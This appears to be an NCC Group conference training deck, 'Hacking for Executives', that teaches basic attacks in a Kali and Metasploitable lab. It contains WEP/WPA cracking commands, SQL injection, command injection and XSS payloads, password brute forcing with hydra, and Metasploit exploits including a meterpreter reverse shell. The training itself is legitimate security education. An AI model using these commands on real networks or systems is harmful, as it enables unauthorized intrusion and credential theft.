ntxissacsc5 red 1 & 2 basic hacking tools ncc group

Hacking for Executives

Basic Hacks Used by Real World Attackers

North Texas Cyber Security Conference

November 10th, 2017

Tony Cargile and Matt Nash

• Introductions

• Session 1

• Getting the Lab Set Up

• Configuring our Wifi Card

• Attacking WEP protected routers

• Brute forcing WPA protected routers

• Finish Up With A Q&A

• Session 2

• Enumeration

• Web Application Attacks

• Brute Force Attacks

• Accessing Backdoors

• Exploiting Known Vulnerabilities

Agenda

~ tony$ whoami

• Principal Security Consultant at NCC Group

• Austin Office

• Specializing in Application Security and Security Development LifeCycle

• National Conferences on DANE and SDLC

• Background in Development

• Bachelor of Science in Computer Science from University of Texas at Austin

• Born and raised in Fort Worth, but don’t hold that against me

~ matt$ whoami

• Security Consultant at NCC Group

• Austin Office

• Specializing in Application Security, Infrastructure Assessment,

and Forensics

• Certified Digital Forensic Investigator and Incident

Responder

• Background in System Administration

• Bachelor of Science in Food & Resource Economics from

University of Florida

• Born and raised in Florida - sometimes referred to as Florida Man

• (only some of the news stories are true)

What is this training

• This is not a BlackHat Training

• No technical experience needed

• The purpose of this training is to

teach basic attacks and tools to

managers and executives in

decision making roles within the

security realm.

• All the tools and labs are open

source and available online

The Lab

• Everyone will be constructing their own

“hacker lab” within their computer.

• The Lab will consist of two virtual

machines, controlled by VMware

Player:

• Kali Linux: A common attacker

Linux OS

• Metasploitable: A purposefully

vulnerable Linux OS

• This course is designed for Windows,

but 100% possible on Macs and Linux

The Wifi Lab

• SSID: NCC Lab 1

• WPA Password Protected

• BSSID: 00:1F:33:E5:2C:A1

• Password: ?

• SSID: NCC Lab 2

• WEP Protected

• BSSID: 68:7F:74:C4:D8:64

• Password: ?

Setting Up the Lab

Opening the USB

• 3 Files

• Kali Linux VM – 7zipped

• Metasploitable 2 VM – zipped

• VMware Player Windows Installer

VMWare Install

• First, start by running the VMware installer

VMWare Install

• Accept the EULA

VMware install

• No need to install the Enhanced Keyboard Driver

VMware install

• Determine whether you want to give VMware your data

VMware install

VMware install

Run VMware Player Once Installed

• Once installed, on first run it will ask for a license

Extracting the VMs

Extracting the VMs

• Extract to an easy to locate

address.

• Take note of where you extracted

• Don’t put it on the USB

Installing 7-Zip

Right-click on the 7-Zip installer and click “Run as administrator”

Installing 7-Zip

Enter administrator password and click “Yes”

Installing 7-Zip

Click “Install”

Installing 7-Zip

Installing 7-Zip

Open 7-Zip program and navigate to the folder containing the Kali archive

Installing 7-Zip

Select the Kali Archive and click “Extract”

Installing 7-Zip

Choose an extraction location and click “OK”

Extracting the VMs

Opening the VMs

Opening the VMs

Configuring the VMs

• This is an important step

for 2 reasons:

1. We need to make sure

that our VMs can talk to

each other.

2. We need to make sure

that we don’t expose our

VMs to the world.

Configuring the VMs

• Verify that the

Network Adapter says

“NAT”

Powering On Metasploitable

Powering On Metasploitable

Powering On Metasploitable

Powering On Metasploitable

Installing VMware Tools

Logging Into Metasploitable

• Default credentials:

• Username: msfadmin

• Password: msfadmin

Logged into Metasploitable

Getting the IP Address

INPUT: ifconfig

• Note the IP Address: we will need it later!

Powering on Kali

• You will go through the

same steps as when you

powered on Metasploitable.

• Click “I copied it”

• Don’t change the keyboard

timeout

• Install VMware tools.

Kali Starting Up

Enable Full Screen

Log into Kali

• Default credentials:

• Username: root

• Password: toor

Kali on Startup

Opening the terminal

• Unlike Windows, the task bar is on the top

• Kali now has the quick start bar on the left

• Click the black terminal icon

Getting Kali’s IP Address

COMMAND: ifconfig

• Note the IP Address: we will need it later!

Wireless Attacks

Connect USB WiFi Adapter to Kali

Plug in the provided USB wireless adapter and click

the “Show devices” icon in the top-right

Connect USB WiFi Adapter to Kali

Mouse over USB icon to display connected USB device

Connect USB WiFi Adapter to Kali

Right-click on USB icon and click “Connect (Disconnect from host)”

Connect USB WiFi Adapter to Kali

Verify Kali Sees the WiFi Adapter

Check the Name of the WiFi Interface

Open a Terminal window and use `ip addr` command to list network interfaces

INPUT: ip addr

Place WiFi Interface Into Monitor Mode

Use `airmon-ng` to place wlan0 interface into “monitor” mode

INPUT: airmon-ng start wlan0

Kill Problematic Processes

Use `airmon-ng` to kill processes which may cause problems with wireless interception

INPUT: airmon-ng check kill

Kill Problematic Processes

Use `airodump-ng` to search for nearby wireless access points

INPUT: airodump-ng wlan0mon

Nearby Wireless Access Points

We see two interesting access points – one with WEP encryption

(NCC Lab 2) and another with WPA encryption (NCC Lab 1)

Cracking WEP

Nearby Wireless Access Points

We see two interesting access points – one with WEP encryption

(NCC Lab 2) and another with WPA encryption (NCC Lab 1)

Capturing Wireless Traffic

Use `airodump-ng` to capture traffic to/from the identified WEP-encrypted access point

INPUT: airodump-ng –c 6 –bssid 68:7F:74:C4:D8:64 –ivs

–w Desktop/NCC-Lab-2/NCC-Lab-2_ivs wlan0mon

Capturing Wireless Traffic

Actively capturing data to/from the identified WEP-encrypted access point

Capturing Wireless Traffic

Using `aircrack-ng` against the captured wireless data

INPUT: aircrack-ng Desktop/NCC-Lab-2/NCC-Lab-2_ivs-01.ivs

Capturing Wireless Traffic

`aircrack-ng` has cracked the WEP key used to encrypt data

to/from this wireless access point

Capturing Wireless Traffic

`aircrack-ng` has cracked the WEP key used to

encrypt data to/from this wireless access point

Bruteforcing WPA

Nearby Wireless Access Points

We see two interesting access points – one with WEP encryption

(NCC Lab 2) and another with WPA encryption (NCC Lab 1)

Capturing Wireless Traffic

Use `airodump-ng` to capture traffic to/from the identified WPA-encrypted access point

INPUT: airodump-ng –c 11 –bssid 00:1F:33:E5:2C:A1

–w Desktop/NCC-Lab-1/NCC-Lab-1 wlan0mon

Capturing Wireless Traffic

Actively capturing data to/from the identified WPA-encrypted access point

Capturing Wireless Traffic

Using `aircrack-ng` against the captured wireless data

INPUT: aircrack-ng -b 00:1F:33:E5:2C:A1 –w /usr/share/wordlists/rockyou.txt

Desktop/NCC-Lab-1/NCC-Lab-1-01.cap

Capturing Wireless Traffic

`aircrack-ng` is attempting a brute force attack using the

passwords in the “rockyou” wordlist

Capturing Wireless Traffic

`aircrack-ng` has cracked the WPA key used to

encrypt data to/from this wireless access point

Web Application Attacks

Open the Web Browser

• Select the orange Firefox ESR icon

• Can also be selected by going to Applications

Browse to Metasploitable

• Input the IP Address of Metasploitable into the URL Bar

Welcome to DVWA

Turn on Easy Mode

The Reset Button

SQL Injection

• What is it?

• How prevalent is it?

• How much damage can it cause?

SQL Injection

SQL Injection

SQL Injection

• Error messages are great resources for Attackers!

SQL Injection

INPUT: ‘ or 1=1+’

SQL Injection

INPUT: ‘ UNION ALL SELECT user,password from users where 1=1+’

Command Injection

• What is it?

• How prevalent is it?

• How much damage can it cause?

• Similar to SQL Injection, but instead of injecting into SQL Database,

we are injecting into a command request by the web application server.

Command Injection

INPUT: 8.8.8.8

Command Injection

Command Injection

INPUT: 8.8.8.8; ls

Command Injection

INPUT: 8.8.8.8; whoami

Command Injection

INPUT: 8.8.8.8; cat /etc/passwd

Local File Inclusion/Directory Traversal

• What is it?

• How prevalent is it?

• How much damage can it cause?

Local File Inclusion/Directory Traversal

Local File Inclusion/Directory Traversal

INPUT: test.php

Local File Inclusion/Directory Traversal

INPUT: ../../phpinfo.php

Local File Inclusion/Directory Traversal

INPUT: ../../../../../../../../etc/passwd

Cross Site Scripting

• What is it?

• How prevalent is it?

• How much damage can it cause?

Stored Cross Site Scripting

Stored Cross Site Scripting

Stored Cross Site Scripting

INPUT: <img src=“http://bit.ly/2dtWOWN”>

Stored Cross Site Scripting

Stored Cross Site Scripting

INPUT: <script>alert(document.cookie);</script>

Stored Cross Site Scripting

Stored Cross Site Scripting

DON’T DO THIS: <script>document.location=“https://nccgroup.trust”;</script>

Reflected Cross Site Scripting

Reflected Cross Site Scripting

Reflected Cross Site Scripting

Reflected Cross Site Scripting

Reflected Cross Site Scripting

Reflected Cross Site Scripting

Network Penetration Attacks

Enumeration

INPUT: nmap -sV -p- 192.168.132.128

Enumeration

Brute Forcing Passwords

INPUT: hydra -l sys –P /usr/share/john/password.lst –t 4 192.168.132.128 ssh

Brute Forcing Passwords

Brute Forcing Passwords

INPUT: ssh sys@192.168.132.128

Running Metasploit

INPUT: msfconsole

Enumeration

Loading an Exploit

INPUT: use exploit/unix/ftp/vsftpd_234_backdoor

Loading an ExploitINPUT: show options

INPUT: set RHOST 192.168.132.128

Running an Exploit

INPUT: run

Running an ExploitINPUT: id

INPUT: whoami

INPUT: ls

Loading an Exploit

INPUT: use exploit/unix/misc/distcc_exec

Loading an ExploitINPUT: show options

INPUT: set RHOST 192.168.132.128

Running an Exploit

INPUT: run

INPUT: id

INPUT: ls

Exploiting Java RMI Using Meterpreter

INPUT: use exploit/multi/misc/java_rmi_server

INPUT: show options

Exploiting Java RMI Using Meterpreter

INPUT: set RHOST 192.168.132.128

INPUT: set LHOST 192.168.132.129

INPUT: set PAYLOAD java/meterpreter/reverse_tcp

INPUT: run

Q&A

Contact Us

• Mitchell Merrick

• Strategic Account Manager

• Mitchell.Merrick@nccgroup.trust

• (512) 431-6213

• Tony Cargile

• Principal Security Consultant

• Tony.Cargile@nccgroup.trust

• Matt Nash

• Security Consultant

• Matt.Nash@nccgroup.trust

• www.nccgroup.trust

• https://www.linkedin.com/company/ncc-group/

• https://twitter.com/NCCGroupplc

• https://www.facebook.com/NCCGroupplc/

• https://plus.google.com/+nccgroup

127

Office Locations

EuropeManchester - Head Office

Basingstoke

Belgium

Cheltenham

Denmark

Edinburgh

Germany

Glasgow

Leatherhead

Leeds

Lithuania

London

Luxembourg

Milton Keynes

Spain

Sweden

Switzerland

The Netherlands

USAAtlanta, GA

Austin, TX

Chicago, IL

New York, NY

San Francisco, CA

Seattle, WA

Sunnyvale, CA

AustraliaSydney

CanadaKitchener, ON

Middle EastDubai